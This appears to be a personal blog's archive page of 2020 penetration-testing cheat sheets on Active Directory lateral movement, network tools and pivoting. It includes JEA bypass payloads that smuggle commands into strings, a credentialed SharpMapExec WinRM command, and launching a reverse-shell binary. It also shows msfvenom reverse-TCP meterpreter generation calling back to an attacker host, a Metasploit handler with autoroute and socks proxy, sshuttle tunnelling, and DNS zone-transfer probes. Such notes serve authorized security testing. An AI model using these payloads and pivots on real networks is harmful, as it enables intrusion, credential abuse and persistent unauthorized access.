Skip to main content

Posts

Showing posts from 2020

AD PenTest- Lateral Movement & Persistance

  Bypassing JEA #View all the commands that we have access to get-command * #View the source code of the Commands/cmdlets Get-Command -ShowCommandInfo -Name CmdLet_NAME Get-Command -ShowCommandInfo -Name Get-ChildItem #using SharpMapExec to bypass JEA or find interesting items |.\SharpMapExec.exe ntlm winrm /user:USERNAME/password:"p@ssw0RD!" /domain:steins.local /computername:10.10.10.10 Note : ExpandString & Invoke-Expression might be vulnerable to command execution #Examples of Bypasing JE A get-something -command 'Hello $([void] (Get-Item C:\))' get-something -command '$(""; ipconfig)' #If Full language mode is enabled function test() {whoami};test #Bypassing JEA if start-Process is accessible Enter-PSSession -ComputerName <Name> -ConfigurationName <Name> Start-Process cmd.exe revshell.exe Powershell Remote Access Enable-PSRemoting #uses TCP - Port 5985, 5986 for SSL. #Start a PS Session Enter-PSSession -ComputerName kurisu.st...

Network & Linux Tools

    Traceroute By default, tracroute sends UDP packets with incrementing dest ports starting at the bsae port of 33434, going up by one port for each packet sent (each hop measured 3 times) #traceroute to multiple hosts traceroute -g 10.10.10.1, 10.10.10.2 #Use ICMP instead of UDP traceroute -I 10.10.10.10 #Use TCP SYN instead of UDP traceroute -T 10.10.10.10 Online Traceroute Websites : 1) Traceroute.org 2) Kloth.net/services/traceroute.php 3) tracert.com nslookup check if there is anything in the - DNS Cache Snooping >nslookup set norecurse www.website.com set recurse wwww.website.com #Zone transfer > dig @10.10.10.10 target -t AXFR #Incremental Zone Transfer dig @10.10.10.10 -t IXFR=N Kill a running Process/Open Port netstat -pantp | grep LIST #View the process ID sudo lsof -t -i:80 #Kill the process sudo fuser -k 80/tcp  Find Largest Files in Linux du -a /var | sort -n -r | head -n 10 #Get Readable output du -hsx -- * | sort -rh | head -10 Installing Samba on...

Pivoting into an internal network behind firewall

    Accessing a Victim network from Windows box which is pivoted to Kali #On Kali sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24 #On windows route print #delete default route route delete 0.0.0.0 #add a new route to kali- setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box route add 0.0.0.0 mask 0.0.0.0 KALI_IP #Now you should be able to access all the sites which are accessible on kali from windows box. #to revert the changes; 192.168.206.2 route delete 0.0.0.0 route add 0.0.0.0 mask 0.0.0.0 VMWare_Gateway Get a Meterpreter on the Target and add a route to attacker machine msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.14.14.3 LPORT=4444 -f elf -o rev msfconsole use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 10.14.14.3 set LPORT 4444 run background sessions -i use post/multi/manage/autoroute set SUBNET 192.168.125.0 set SESSION 4 run use auxiliary/server/socks_proxy set SRVPORT 1060 run ...